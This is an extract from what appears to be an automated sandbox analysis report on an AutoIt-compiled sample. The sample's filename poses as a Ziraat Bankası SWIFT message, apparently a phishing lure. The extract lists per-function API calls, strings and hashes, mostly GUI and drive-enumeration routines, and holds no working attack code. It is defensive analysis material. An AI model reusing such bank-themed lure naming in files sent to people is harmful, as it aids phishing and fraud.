SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000DA81D

Strings

DISPLAY, xrefs: 000DA680
AutoIt v3, xrefs: 000DA4D0
, xrefs: 000DA7A3
static, xrefs: 000DA518, 000DA66F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: fffc008b2e07b5a557e8ffc958ea9ecfb08e06658dab1b9fa571f9d277125d67
Instruction ID: 102cedf6d2e41484313e8c80d2d021a9f38a948617e3d0f0bdbc13a04c16971a
Opcode Fuzzy Hash: fffc008b2e07b5a557e8ffc958ea9ecfb08e06658dab1b9fa571f9d277125d67
Instruction Fuzzy Hash: 9A027C75A00204EFDB14DFA4DD89EAE7BB9FB49310F048159F955AB2A1CB70ED81CB60

Function 000ED285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 000ED2DB
GetSysColorBrush.USER32(0000000F), ref: 000ED30C
GetSysColor.USER32(0000000F), ref: 000ED318
SetBkColor.GDI32(?,000000FF), ref: 000ED332
SelectObject.GDI32(?,00000000), ref: 000ED341
InflateRect.USER32(?,000000FF,000000FF), ref: 000ED36C
GetSysColor.USER32(00000010), ref: 000ED374
CreateSolidBrush.GDI32(00000000), ref: 000ED37B
FrameRect.USER32(?,?,00000000), ref: 000ED38A
DeleteObject.GDI32(00000000), ref: 000ED391
InflateRect.USER32(?,000000FE,000000FE), ref: 000ED3DC
FillRect.USER32(?,?,00000000), ref: 000ED40E
GetWindowLongW.USER32(?,000000F0), ref: 000ED439

Part of subcall function 000ED575: GetSysColor.USER32(00000012), ref: 000ED5AE
Part of subcall function 000ED575: SetTextColor.GDI32(?,?), ref: 000ED5B2
Part of subcall function 000ED575: GetSysColorBrush.USER32(0000000F), ref: 000ED5C8
Part of subcall function 000ED575: GetSysColor.USER32(0000000F), ref: 000ED5D3
Part of subcall function 000ED575: GetSysColor.USER32(00000011), ref: 000ED5F0
Part of subcall function 000ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED5FE
Part of subcall function 000ED575: SelectObject.GDI32(?,00000000), ref: 000ED60F
Part of subcall function 000ED575: SetBkColor.GDI32(?,00000000), ref: 000ED618
Part of subcall function 000ED575: SelectObject.GDI32(?,?), ref: 000ED625
Part of subcall function 000ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 000ED644
Part of subcall function 000ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED65B
Part of subcall function 000ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 000ED670
Part of subcall function 000ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED698

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: f55e3284c78c78b380c43d4cb21f742dbe7ff3fe670e0c95b6fee76b8c3c702e
Instruction ID: d2c618cdeb479e62c41f2a24dce3aec7cd6917e71694e203ff9ec1e6a3808115
Opcode Fuzzy Hash: f55e3284c78c78b380c43d4cb21f742dbe7ff3fe670e0c95b6fee76b8c3c702e
Instruction Fuzzy Hash: 39917271408301BFC7109FA4EC08A6B7BF9FF85325F104A19F9A2A61E0DBB1D984CB52

Function 0009B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0009B98B
DeleteObject.GDI32(00000000), ref: 0009B9CD
DeleteObject.GDI32(00000000), ref: 0009B9D8
DestroyIcon.USER32(00000000), ref: 0009B9E3
DestroyWindow.USER32(00000000), ref: 0009B9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 000FD2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000FD2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 000FD711

Part of subcall function 0009B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0009B759,?,00000000,?,?,?,?,0009B72B,00000000,?), ref: 0009BA58

SendMessageW.USER32 ref: 000FD758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000FD76F
ImageList_Destroy.COMCTL32(00000000), ref: 000FD785
ImageList_Destroy.COMCTL32(00000000), ref: 000FD790

Strings

0, xrefs: 000FD5A5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: b7d1f9e2f3229cf0e1272a0e91db09e8a4685d07c3341e162c575be5132496b7
Instruction ID: 831104680da42e1f52e8af9b46d71c1cec49aee4712c43d62f431a76ad595b5e
Opcode Fuzzy Hash: b7d1f9e2f3229cf0e1272a0e91db09e8a4685d07c3341e162c575be5132496b7
Instruction Fuzzy Hash: 21129E30104205DFDB61DF28D988BB9B7E6FF45314F14456AEA89CBA62C731EC81EB91

Function 000D9F50 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 000D9F83
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 000DA042
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 000DA080
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 000DA092
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 000DA0D8
GetClientRect.USER32(00000000,?), ref: 000DA0E4
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 000DA128
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 000DA137
GetStockObject.GDI32(00000011), ref: 000DA147
SelectObject.GDI32(00000000,00000000), ref: 000DA14B
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 000DA15B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 000DA164
DeleteDC.GDI32(00000000), ref: 000DA16D
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 000DA19B
SendMessageW.USER32(00000030,00000000,00000001), ref: 000DA1B2
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 000DA1ED
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 000DA201
SendMessageW.USER32(00000404,00000001,00000000), ref: 000DA212
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 000DA242
GetStockObject.GDI32(00000011), ref: 000DA24D
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 000DA258
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 000DA262

Strings

DISPLAY, xrefs: 000DA12D
AutoIt v3, xrefs: 000DA0D0
msctls_progress32, xrefs: 000DA1E3
static, xrefs: 000DA122, 000DA23C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: d68d7c9191f0bbc07b75f0f5b310da50dfd838caaf21b1aac5526b0bab82bc8d
Instruction ID: ac43b604502d5926bafa18f6110530a50a12d53fdc978612023e08d9a073b3ab
Opcode Fuzzy Hash: d68d7c9191f0bbc07b75f0f5b310da50dfd838caaf21b1aac5526b0bab82bc8d
Instruction Fuzzy Hash: C3A17C75A40214BFEB14DFA8DC4AFAE7BB9EB05710F004115FA14A76E0DBB0AD81CB64

Function 000CDBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000CDBD6
GetDriveTypeW.KERNEL32(?,0011DC54,?,\\.\,0011DC00), ref: 000CDCC3
SetErrorMode.KERNEL32(00000000,0011DC54,?,\\.\,0011DC00), ref: 000CDE29

Strings

Fixed, xrefs: 000CDD0B
\\.\, xrefs: 000CDC2B
ATAPI, xrefs: 000CDD9A
MMC, xrefs: 000CDDE7
Removable, xrefs: 000CDD15
SATA, xrefs: 000CDDD9
SSA, xrefs: 000CDDAF
iSCSI, xrefs: 000CDDCB
PhysicalDrive, xrefs: 000CDC67
Network, xrefs: 000CDD01
RAMDisk, xrefs: 000CDCED
CDROM, xrefs: 000CDCF7
Virtual, xrefs: 000CDDEE
ATA, xrefs: 000CDDA1
1394, xrefs: 000CDDA8
USB, xrefs: 000CDDBD
Unknown, xrefs: 000CDCE3, 000CDD8C
SAS, xrefs: 000CDDD2
RAID, xrefs: 000CDDC4
SCSI, xrefs: 000CDD93
FileBackedVirtual, xrefs: 000CDDF5
SSD, xrefs: 000CDD50
Fibre, xrefs: 000CDDB6

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 4adf32598cf13d96bebc2418b81f1fdfaf22399d51f39179f462980c7a413522
Instruction ID: 16a5b03ebc0a773bb4fc7c39ee38482f20ef04f53cd8ca9183211f083994c9c8
Opcode Fuzzy Hash: 4adf32598cf13d96bebc2418b81f1fdfaf22399d51f39179f462980c7a413522
Instruction Fuzzy Hash: 33519D30648302ABC620EB54C882E6DB7E0FB94705F24597FF0679B296DB70D985DB46

Function 0008CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0008CC68
__wcsnicmp.LIBCMT ref: 0008CC80
__wcsnicmp.LIBCMT ref: 0008CC98
__wcsnicmp.LIBCMT ref: 0008CCB0
__wcsnicmp.LIBCMT ref: 0008CCC8
__wcsnicmp.LIBCMT ref: 0008CCE0
__wcsnicmp.LIBCMT ref: 0008CCF8
__wcsnicmp.LIBCMT ref: 0008CD0C
__wcsnicmp.LIBCMT ref: 0008CD4D
__wcsnicmp.LIBCMT ref: 0008CD61
__wcsnicmp.LIBCMT ref: 0008CD75
__wcsnicmp.LIBCMT ref: 0008CD89

Strings

#requireadmin, xrefs: 0008CC92
#comments-start, xrefs: 0008CCF2, 0008CD47
#cs, xrefs: 0008CD06, 0008CD5B
#comments-end, xrefs: 0008CD6F
Bad directive syntax error, xrefs: 000F2ECB
#include, xrefs: 0008CCDA
#notrayicon, xrefs: 0008CC7A
#ce, xrefs: 0008CD83
#include-once, xrefs: 0008CCC2
#OnAutoItStartRegister, xrefs: 0008CCAA
#pragma compile, xrefs: 0008CC62
Cannot parse #include, xrefs: 000F2FA1
Unterminated group of comments, xrefs: 000F2FB4

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 42cc0032a40636f642ff7d55114dea415b8abbf50152787c4e5615a41b137c46
Instruction ID: 3bfe51be466d9ed9a3cc125d42735bf78402170940cd8bec146a1fec842c9fc9
Opcode Fuzzy Hash: 42cc0032a40636f642ff7d55114dea415b8abbf50152787c4e5615a41b137c46
Instruction Fuzzy Hash: F281E531640219ABEB24BAA4ED42FFE37B9BF25310F044039F945AA1C3EB74D945D3A5

Function 000EC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 000EC788
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 000EC83E
SendMessageW.USER32(?,00001102,00000002,?), ref: 000EC859
SendMessageW.USER32(?,000000F1,?,00000000), ref: 000ECB15

Strings

0, xrefs: 000EC89C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 982314e4e73c918fb67701b128bea64baecb13dd345301c4e6073d8264070eea
Instruction ID: fdbc6542cbb844a4303a6e07a3c87614a0a1b846099a602d121b6bdc2e0be384
Opcode Fuzzy Hash: 982314e4e73c918fb67701b128bea64baecb13dd345301c4e6073d8264070eea
Instruction Fuzzy Hash: E5F1D371204381AFF7618F25CC49FAABBE4FF45354F18052DF599A62A1C776C882CB92

Function 000ED575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 000ED5AE
SetTextColor.GDI32(?,?), ref: 000ED5B2
GetSysColorBrush.USER32(0000000F), ref: 000ED5C8
GetSysColor.USER32(0000000F), ref: 000ED5D3
CreateSolidBrush.GDI32(?), ref: 000ED5D8
GetSysColor.USER32(00000011), ref: 000ED5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED5FE
SelectObject.GDI32(?,00000000), ref: 000ED60F
SetBkColor.GDI32(?,00000000), ref: 000ED618
SelectObject.GDI32(?,?), ref: 000ED625
InflateRect.USER32(?,000000FF,000000FF), ref: 000ED644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED65B
GetWindowLongW.USER32(00000000,000000F0), ref: 000ED670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000ED6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 000ED6DD
DrawFocusRect.USER32(?,?), ref: 000ED6E8
GetSysColor.USER32(00000011), ref: 000ED6F6
SetTextColor.GDI32(?,00000000), ref: 000ED6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 000ED712
SelectObject.GDI32(?,000ED2A5), ref: 000ED729
DeleteObject.GDI32(?), ref: 000ED734
SelectObject.GDI32(?,?), ref: 000ED73A
DeleteObject.GDI32(?), ref: 000ED73F
SetTextColor.GDI32(?,?), ref: 000ED745
SetBkColor.GDI32(?,?), ref: 000ED74F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: b0cb09813e5db9aa674625aab9cb5e2e370f201121cd5c8adb68d3801b948b72
Instruction ID: 37274854d8c46cbcdfe1b5f98dd50f766fd1fd5cc9bb90d0fee42482fa8b6530
Opcode Fuzzy Hash: b0cb09813e5db9aa674625aab9cb5e2e370f201121cd5c8adb68d3801b948b72
Instruction Fuzzy Hash: 66513072900208BFDF109FA5EC48EAE7BB9FF48324F114515FA55AB2A1DBB19A40DF50

Function 000EB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000EB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB7C1
CharNextW.USER32(0000014E), ref: 000EB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000EB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000EB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 000EB875
SetWindowTextW.USER32(?,0000014E), ref: 000EB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 000EB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 000EB90E
_memset.LIBCMT ref: 000EB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 000EB97C
_memset.LIBCMT ref: 000EB9DB
SendMessageW.USER32 ref: 000EBA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 000EBA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 000EBB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 000EBB2C
GetMenuItemInfoW.USER32(?), ref: 000EBB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000EBBA3
DrawMenuBar.USER32(?), ref: 000EBBB2
SetWindowTextW.USER32(?,0000014E), ref: 000EBBDA

Strings

0, xrefs: 000EBB4F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 70771794cf22d342f4d97facf1ea1e16b1a7501aec577bca1f27bba163066e06
Instruction ID: b5a507d26c3d42495bce963eca520ee25ca1fb1973b72fa8438a3b39985f9306
Opcode Fuzzy Hash: 70771794cf22d342f4d97facf1ea1e16b1a7501aec577bca1f27bba163066e06
Instruction Fuzzy Hash: CDE17F75900258AFDB209FA6DC84AFF7BB8FF05710F108156F959BA191DBB08A81DF60

Function 000C6CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 000C6CFB
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000C6D21
_wcscpy.LIBCMT ref: 000C6D4F
_wcscmp.LIBCMT ref: 000C6D5A
_wcscat.LIBCMT ref: 000C6D70
_wcsstr.LIBCMT ref: 000C6D7B
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 000C6D97
_wcscat.LIBCMT ref: 000C6DE0
_wcscat.LIBCMT ref: 000C6DE7
_wcsncpy.LIBCMT ref: 000C6E12

Strings

DefaultLangCodepage, xrefs: 000C6DFA
StringFileInfo\, xrefs: 000C6D6A
%u.%u.%u.%u, xrefs: 000C6E75
\VarFileInfo\Translation, xrefs: 000C6D8F
04090000, xrefs: 000C6DCD

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 721d23592c33f031b3a86fa9403925578d2cd82693498db69263d44391419af7
Instruction ID: d1f9240faf125786e36f995e712c571a0eae90203dfe3147409e4c6a175f7599
Opcode Fuzzy Hash: 721d23592c33f031b3a86fa9403925578d2cd82693498db69263d44391419af7
Instruction Fuzzy Hash: 2341D672A00205BBEB10ABA4DC47FFF77BCDF46710F044069F901E2183EB759A0196A6

Function 0009A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A939
GetSystemMetrics.USER32(00000007), ref: 0009A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A96C
GetSystemMetrics.USER32(00000008), ref: 0009A974
GetSystemMetrics.USER32(00000004), ref: 0009A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0009A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0009A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0009A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0009AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0009AA2B
GetStockObject.GDI32(00000011), ref: 0009AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0009AA52

Part of subcall function 0009B63C: GetCursorPos.USER32(000000FF), ref: 0009B64F
Part of subcall function 0009B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0009B66C
Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000001), ref: 0009B691
Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000002), ref: 0009B69F

SetTimer.USER32(00000000,00000000,00000028,0009AB87), ref: 0009AA79

Strings

AutoIt v3 GUI, xrefs: 0009A9F1

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 85c7163ae83c546a80606ae974551d43cdfcc978e60c509025805c70507cb2f8
Instruction ID: b98e18a2adff735103a7f13d625bb367b20594f96ca0cab3502ab0c1f4b046ff
Opcode Fuzzy Hash: 85c7163ae83c546a80606ae974551d43cdfcc978e60c509025805c70507cb2f8
Instruction Fuzzy Hash: 8AB1AC75A4020AAFDF14DFA8DC45BEE7BB5FB09314F114229FA15A72A0DBB0D880DB51

Function 000BCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 000BCF91
__swprintf.LIBCMT ref: 000BD032
